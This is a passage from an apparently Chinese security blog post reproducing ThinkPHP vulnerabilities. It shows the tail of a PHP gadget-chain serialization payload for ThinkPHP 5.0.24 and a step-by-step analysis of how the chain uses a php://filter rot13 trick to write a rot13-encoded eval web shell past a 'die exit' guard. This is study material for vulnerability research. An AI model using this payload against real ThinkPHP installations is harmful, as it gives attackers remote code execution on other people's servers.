$model;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;model=<span class="keyword">new</span> \think\console\Output();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">console</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Output</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $styles;</span><br><span class="line">	<span class="keyword">private</span> $handle;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;styles=[<span class="string">'getAttr'</span>];</span><br><span class="line">		<span class="keyword">$this</span>-&gt;handle=<span class="keyword">new</span> \think\session\driver\Memcache();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">session</span>\<span class="title">driver</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Memcache</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $handler;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;handler=<span class="keyword">new</span> \think\cache\driver\File();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">cache</span>\<span class="title">driver</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">File</span></span>&#123;</span><br><span class="line">	<span class="keyword">protected</span> $options;</span><br><span class="line">	<span class="keyword">protected</span> $tag;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span>&#123;</span><br><span class="line">		<span class="keyword">$this</span>-&gt;options=[<span class="string">'path'</span>=&gt;<span class="string">'php://filter/write=string.rot13/resource=&lt;?cuc @riny($_CBFG["nn"]);?&gt;'</span>,<span class="string">'data_compress'</span> =&gt; <span class="keyword">false</span>,<span class="string">'cache_subdir'</span>  =&gt; <span class="keyword">false</span>,<span class="string">'prefix'</span>        =&gt; <span class="keyword">false</span>,<span class="string">'expire'</span>        =&gt; <span class="number">0</span>,<span class="string">'prefix'</span>        =&gt; <span class="string">''</span>];</span><br><span class="line">		<span class="keyword">$this</span>-&gt;tag=<span class="number">1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$a=<span class="keyword">new</span> \think\process\pipes\Windows();</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize($a));</span><br></pre></td></tr></table></figure>

<h3 id="漏洞分析-3"><a href="#漏洞分析-3" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>这条链子是利用php://filter绕过死亡exit;，写入shell，接下来具体分析一下整个链子和自己的一些体会，由于这是我复现的第一条反序列化利用链子，所以写的很详细。</p>
<p>首先全局搜索一下<code>__destruct</code>方法，发现在\think\process\pipes\Windows.php中存在一个file_exists能够触发<code>__tostring</code></p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027134816558.png" alt="image-20201027134816558"></p>
<p>接着全局搜索一下<code>__tostring</code>，一个一个找，看有没有配合其他魔术方法(比如<code>__call</code>之类的)的点，发现在\think\Model.php中的<code>__tostring</code>方法存在一个可以调用<code>__call</code>（PS:找这种<code>__call</code>魔术方法的时候需要注意参数一定是要可控的）的点。</p>
<p>这里需要注意的是，由于Model类是一个抽象类，不能被反序列化，所以需要找一下他的子类来进行利用，这里我们使用think\model\Pivot类。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027135634826.png" alt="image-20201027135634826"></p>
<p>注意看我打断点的三处，可以注意到，代码从<code>$this-&gt;relation</code>数组中取到relation的值，然后调用<code>$this-&gt;$relation()</code>来获取modelRelation的值，所以首先我们在该类中找到一个返回值可控的方法，我找了一个<code>getwhere</code>方法。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027140717245.png" alt="image-20201027140717245"></p>
<p>可见，<code>$where=$this-&gt;updateWhere</code>，updateWhere刚好是我们可控的，但是想让他成功返回还需设置<code>$this-&gt;pk</code>，否则<code>$pk</code>取不到值会抛出异常，结束程序。控制modelrelation的主要目的还是为了控制<code>$value</code>，跟进getRelationData方法。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027141629615.png" alt="image-20201027141629615"></p>
<p>首先可以看到，这里的modelRelation必须是Relation抽象类的子类，而且在前面看到，modelRelation也必须要存在getBindAttr方法才能到达我们的利用点，全局搜索一下，发现只有\think\model\relation\OneToOne类满足这个要求，我们可以看到，OneToOne类任然是一个抽象类，所以需要通过它的子类来利用，这里我使用的是\think\model\relation\HasOne类。</p>
<p>说完了ModelRelation类的要求，回到这个if语句，第一个条件是我们的返回值(可控)，第二个条件可以使用<code>$this-&gt;selfRelation=1</code>来通过判断，第三个条件调用了getModel方法，跟入该方法。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027143155952.png" alt="image-20201027143155952"></p>
<p>这里调用了Query类的getModel方法，返回值是可控的，所以现在的问题是找到一个可以利用的<code>__call</code>方法，这个放在最后说，回到之前那张长图。</p>
<p>可以看到需要控制的还有<code>$attr</code>变量，它通过getBindAttr方法来获取，之前说过，该方法存在于OneToOne类中。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027143801711.png" alt="image-20201027143801711"></p>
<p>这里直接返回一个可控值，所以现在方法名和参数都可控，全局搜索一下<code>__call</code>方法，一共就十多个，由于我们不能控制方法名，所以目标主要放在调用自身方法的类上，不难发现\think\console\Output类中的<code>__call</code>方法可以利用。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027144239294.png" alt="image-20201027144239294"></p>
<p>跟入block方法，它最终调用write方法，而<code>$this-&gt;handle</code>可控。这里的<code>$message</code>变量就是经过拼接的<code>$args</code>，不过该变量在后面没啥作用，随便设一个值即可。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027144645901.png" alt="image-20201027144645901"></p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027144322532.png" alt="image-20201027144322532"></p>
<p>那么我们继续找哪个类中的write方法能被利用，找了一圈，发现在\think\session\driver\Memcache类的write方法中使用<code>$this-&gt;handle-&gt;set</code>调用set方法，所以我们继续寻找可利用的set方法。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027144841779.png" alt="image-20201027144841779"></p>
<p>最终发现\think\cache\driver\File类中的set方法可以写入文件。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027145208108.png" alt="image-20201027145208108"></p>
<p>同样我也在关键地方打上了断点，首先跟入第一个断点，发现filename是可控的，它后面的拼接我们可以使用php伪协议来绕过。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027145311947.png" alt="image-20201027145311947"></p>
<p>在这里可以传入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/write=string.rot13/resource=&lt;?cuc @riny($_CBFG[&quot;nn&quot;]);?&gt;</span><br></pre></td></tr></table></figure>

<p>现在我们只是能够控制文件名，但是文件的内容我们却不能控制，继续跟入setTagItem方法。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027145803082.png" alt="image-20201027145803082"></p>
<p>可以发现，filename传入之后变成了value,并重新调用了一次set方法，这就意味着现在文件名和参数都可控了，那么第二次的file_put_contents就变成了</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027150340219.png" alt="image-20201027150340219"></p>
<p>成功绕过exit，写入shell。</p>
<p><img src="G:%5CMyBlog%5Csource%5Cimages%5CTP5.0.24%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%90%88%E9%9B%86%5Cimage-20201027150815485.png" alt="image-20201027150815485"></p>
<p>只不过这种方法不能再windows下利用，因为windows文件名不能含有尖括号。</p>
  
	</div>
		<footer class="article-footer clearfix">


<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/漏洞复现/">漏洞复现</a>
</div>



<div class="article-share" id="share">

  <div data-url="http://yoursite.com/2020/09/30/TP5.0.24漏洞复现合集/" data-title="TP5.0.24 | buxqm" data-tsina="" class="share clearfix">
  </div>

</div>
</footer>   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2020/10/02/BUUCTF2/" title="BUUCTF1">
  <strong>PREVIOUS:</strong><br/>
  <span>
  BUUCTF1</span>
</a>
</div>


<div class="next">
<a href="/2020/09/27/极客巅峰/"  title="极客巅峰+月饼赛">
 <strong>NEXT:</strong><br/> 
 <span>极客巅峰+月饼赛
</span>
</a>
</div>

</nav>

	
<section class="comment">
	<div class="ds-thread"></div>
</section>

</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#TP漏洞复现合集"><span class="toc-number">1.</span> <span class="toc-text">TP漏洞复现合集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-15SQL注入复现"><span class="toc-number">1.2.</span> <span class="toc-text">TP5.0.15SQL注入复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置"><span class="toc-number">1.2.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数据库配置"><span class="toc-number">1.2.2.</span> <span class="toc-text">数据库配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围"><span class="toc-number">1.2.3.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现"><span class="toc-number">1.2.4.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析"><span class="toc-number">1.2.5.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-任意代码执行-amp-任意文件写入漏洞复现"><span class="toc-number">1.3.</span> <span class="toc-text">TP5.0.*任意代码执行&amp;任意文件写入漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-1"><span class="toc-number">1.3.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-1"><span class="toc-number">1.3.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP6-0session-任意文件创建-amp-删除漏洞复现"><span class="toc-number">1.4.</span> <span class="toc-text">TP6.0session 任意文件创建&amp;删除漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境配置-2"><span class="toc-number">1.4.1.</span> <span class="toc-text">环境配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#影响范围-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-2"><span class="toc-number">1.4.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-2"><span class="toc-number">1.4.4.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0-24-反序列化利用链分析"><span class="toc-number">1.5.</span> <span class="toc-text">TP5.0.24 反序列化利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#环境搭建"><span class="toc-number">1.5.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞复现-3"><span class="toc-number">1.5.2.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析-3"><span class="toc-number">1.5.3.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li></ol></li></ol>
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
			<li><a href="/categories/Nu1lCtf/" title="Nu1lCtf">Nu1lCtf<sup>1</sup></a></li>
		
			<li><a href="/categories/XXE/" title="XXE">XXE<sup>1</sup></a></li>
		
			<li><a href="/categories/pdo/" title="pdo">pdo<sup>1</sup></a></li>
		
			<li><a href="/categories/trick/" title="trick">trick<sup>1</sup></a></li>
		
			<li><a href="/categories/writeup/" title="writeup">writeup<sup>3</sup></a></li>
		
			<li><a href="/categories/专题-writeup/" title="专题  writeup">专题  writeup<sup>2</sup></a></li>
		
			<li><a href="/categories/协议学习/" title="协议学习">协议学习<sup>1</sup></a></li>
		
			<li><a href="/categories/漏洞复现/" title="漏洞复现">漏洞复现<sup>1</sup></a></li>
		
			<li><a href="/categories/西湖论剑/" title="西湖论剑">西湖论剑<sup>1</sup></a></li>
		
		</ul>
</div>


  

  <div class="rsspart">
	<a href="/atom.xml" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<section class="info">
		<p> Hello <br/>
			似水流年</p>
	</section>
	 
	<div class="social-font clearfix">
		
		
		
		
		
	</div>
		<p class="copyright">Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/A-limon/pacman" target="_blank" title="Pacman">Pacman</a> © 2020 
		
		<a href="http://yoursite.com" target="_blank" title="Ycj">Ycj</a>
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.1.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else
    {
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      h  = $('article h2')
      ah = $('article h2'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  if(ah.length==0){
    t.css('display','none');
  }else{
    c.click(function(){
      ta.css('display', 'block').addClass('fadeIn');
    });
    o.click(function(){
      ta.css('display', 'none');
    });
    $(window).scroll(function(){
      ta.css("top",Math.max(140,320-$(this).scrollTop()));
    });
  };
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#share"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="#textlogo" class="article-back-to-top" title="Top"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="QRcode"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="Weibo"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>


<script type="text/javascript">
  var duoshuoQuery = {short_name:""};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 





  </body>
</html>
